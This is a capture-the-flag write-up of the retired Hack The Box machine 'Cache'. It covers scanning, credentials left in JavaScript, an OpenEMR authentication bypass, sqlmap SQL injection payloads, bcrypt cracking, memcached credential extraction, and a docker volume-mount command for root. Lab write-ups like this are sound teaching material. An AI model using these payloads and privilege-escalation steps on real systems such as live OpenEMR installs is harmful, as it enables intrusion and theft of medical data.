Hack The Box —Cache Write-up

Mayk
5 min readOct 10, 2020
Cache info card.

Summary

Cache is a Linux box of medium difficulty from Hack The Box platform that was retired at 10 October 2020 at 19:00:00 UTC. The process to pwn this box consists of a few stages. Foothold is obtained from a combination of authentication bypass and SQL Injection against a vulnerable web application. The path to root involves compromising a privileged user through memcached and then escalating to root via docker container.

Scanning and Enumeration

After adding an entry in our /etc/hosts file, we perform a typical scanning to check which ports are open.

$ports=$(sudo nmap -p- --min-rate=1000 -T4 cache.htb | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
$sudo nmap -p$ports -T4 -Pn -A cache.htb

The result shows that target has SSH and HTTP services running.

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache

SSH

The command below shows that the SSH service accepts both public key and password authentication methods.

$sudo nmap -p22 -sC --script ssh-auth-methods.nse cache.htbPORT   STATE SERVICE
22/tcp open ssh
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password

HTTP

Performing a directory busting leads to nothing interesting. However, by inspecting the login page we can see some javascript files being loaded.

A list of loaded javascript files from login page.

We can find a credential (ash:H@v3_fun)inside functionality.js file.

Credentials found inside file functionality.js.

Providing the credentials at the login page leads us to a page under construction, so nothing really useful.

A simple page saying “This page is still under construction”.

If we pay attention to the author page, we see that he mentions a work called HMS (Hospital Management System).

Author page with a mention to a previous work called HMS (Hospital Management System).

Next step it to add a new entry at /etc/hosts for hms.htb.

Hospital Management System

Running a tool like dirsearch or gobuster against URL http://hms.htb results in a few documents and directories, one of them being an admin page at http://hms.htb/admin.php.

Admin page at http://hms.htb/admin.php.

We can get useful information from this page. Particularly, it shows that the system is running OpenEMR v5.0.1 (3) with a site ID of default and a database named openemr.

This version of OpenEMR has a bunch of disclosed vulnerabilities. These are discussed in the following paper https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf. We will explore them of course!

Getting a Foothold

Here, we will explore basically two vulnerabilities presented in the paper: authentication bypass and SQL Injection.

We first visit http://hms.htb/portal/account/register.php and then we change the URL to one of those listed in the document above (authentication bypassing).

In this case, we go to http://hms.htb/portal/add_edit_event_user.php?eid=1 and intercept the request with Burp. Next, we copy the request information, past it into a file called req.txt, and verify if it is in fact vulnerable to SQL Injection with sqlmap.

$sqlmap -r req.txt

We will get something like:

Parameter: eid (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: eid=(SELECT (CASE WHEN (8569=8569) THEN 1 ELSE (SELECT 4456 UNION SELECT 7086) END))
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: eid=1 AND EXTRACTVALUE(1189,CONCAT(0x5c,0x717a626271,(SELECT (ELT(1189=1189,1))),0x71787a6271))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: eid=1 AND (SELECT 7311 FROM (SELECT(SLEEP(5)))VdGU)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: eid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a626271,0x517644585a536848764a6263737a7946737663496654475059556f6c6478434666536f6c4f764a4f,0x71787a6271),NULL-- -
---
[16:33:39] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1

Since sqlmapp stores some information about the last execution, we can instruct it to perform additional injections.

The following command returns the tables from the database:

$sqlmap -r req.txt --tables

The openemr database has two tables with user credentials: users and users_secure. The credentials from the former are invalid, but we get the following credentials from the latter:

user: openemr_admin
pass: $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.
salt: $2a$05$l2sTLIG6GTBeyBf7TAKL6A$

This is a bcrypt encrypted password. Since we have the salt, we can try to hash some common passwords with that and see if it corresponds to our password.
The tool DeBcrypt can do that for us:

Cracking password with DeBcrypt tool.

The result is the clear password: xxxxxx.

We can validate this credential by login into
http://hms.htb/interface/login/login.php?site=default.

Exploit

This version of OpenEMR was also found to contain a vulnerability that leads to RCE (Remote Code Execution). The requirement is that we have a valid credential, which we got from the previous step.

The exploit can be found at https://www.exploit-db.com/exploits/48515. After making the necessary changes, we can get a shell for user www-data.

Owning User

Owning user is pretty straightforward. Looking at either /etc/passwd or /home directory, we can see that there is a user called ash. The password is that found at the enumeration stage, so just run su — ash and grab your flag: 22****************************02.

Owning Another User

A little enumeration with psand netstat shows that there is a memcached server running in the target. By interacting with it, we can get credentials for user luffy.

Interacting with memcached to extract stored credentials.

Now we have another credential: luffy:0n3_p1ec3.

More info about how to interact with memcached can be found at https://www.hackingarticles.in/penetration-testing-on-memcached-server.

Owning System

User luffy belongs to group docker. Because of Docker design, any user in this group has root equivalent privileges. So, we can just spawn a container with a volume mapping to the root filesystem in order to own the system.

docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh

And now we have our root shell!

In case this command is strange to you, we are creating a new container from ubuntu image, asking Docker to map the system root directory to /mnt container directory, and finally executing the command chroot /mnt sh in the container.

Enjoy your flag 5c****************************43.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Mayk
Mayk

Written by Mayk

Offensive security practitioner for fun and open source enthusiast. Sometimes I research or break something.

No responses yet

Write a response